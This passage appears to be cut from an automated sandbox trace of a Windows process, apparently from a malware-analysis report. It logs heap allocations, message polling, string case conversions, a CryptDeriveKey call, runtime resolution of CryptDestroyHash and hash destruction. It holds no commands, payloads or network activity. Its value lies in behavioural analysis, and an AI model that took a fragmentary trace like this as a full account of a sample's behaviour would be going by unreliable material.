Size=0x8) returned 0x24b1838 [0206.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.464] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.464] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa5860, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5820) returned 1 [0206.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0206.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0206.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0206.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0206.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0206.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0206.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0206.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0206.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0206.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0206.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0206.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0206.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0206.467] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0206.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.468] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0206.468] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.468] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.469] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.469] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0206.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0206.469] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0206.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.469] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0206.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.469] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0206.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.470] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0206.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.470] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0206.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0206.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0206.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.471] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0206.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0206.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0206.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0206.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0206.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466df0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0206.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0206.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0206.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0206.472] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0206.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0206.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0206.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0206.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0206.472] CryptDestroyHash (hHash=0xaa5860) returned 1 [0206.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0206.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0206.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0206.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0206.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0206.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0206.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0206.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0206.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0206.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0206.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0206.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0206.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0206.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0206.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0206.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0206.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | 